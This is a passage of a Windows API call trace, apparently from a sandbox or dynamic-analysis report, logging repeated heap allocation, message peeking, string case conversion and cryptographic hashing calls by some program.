Size=0x4) returned 0x24b2db8 [0159.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.320] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0159.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0159.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.321] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0159.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0159.321] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0159.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0159.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.322] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0159.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0159.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0159.322] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0159.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.323] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0159.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0159.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0159.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0159.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0159.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0159.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0159.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0159.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0159.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0159.323] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0159.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.323] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0159.324] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0159.324] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0159.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.324] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ab310 [0159.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0159.324] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0159.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0159.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0159.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0159.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0159.324] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0159.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0159.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0159.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0159.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.325] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0159.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0159.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0159.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0159.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0159.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0159.325] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0159.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.325] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0159.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0159.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.325] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0159.325] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0159.325] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0159.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa280 [0159.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0159.326] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0159.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0159.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0159.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0159.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0159.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0159.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0159.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0159.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0159.326] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0159.326] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0159.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0159.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0159.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0159.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0159.326] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0159.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0159.327] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0159.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.327] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0159.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0159.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0159.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0159.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0159.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0159.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3e8 [0159.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0159.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0159.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0159.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0159.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0159.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0159.327] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0159.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0159.327] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0159.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0159.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0159.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0159.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0159.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0159.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0159.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0159.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0159.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0159.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.328] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0159.328] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0159.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.328] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0159.328] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0159.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.328] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.328] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0159.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0159.329] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0159.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0159.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0159.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0159.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0159.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0159.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.329] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0159.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0159.329] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0159.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0159.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0159.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0159.329] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0159.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0159.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0159.330] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0159.330] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0159.330] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0159.330] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.330] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.330] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0159.330] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.330] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0159.330] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.330] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.330] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0159.330] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.330] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0159.330] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.330] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.331] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0159.331] CryptCreateHash (in: hProv=0xab2890, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0159.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.331] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0159.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.331] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.331] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0159.331] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.331] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0159.331] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.331] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0159.331] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0159.332] CryptHashData (hHash=0xaa5660, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0159.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.332] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0159.332] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0159.332] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, 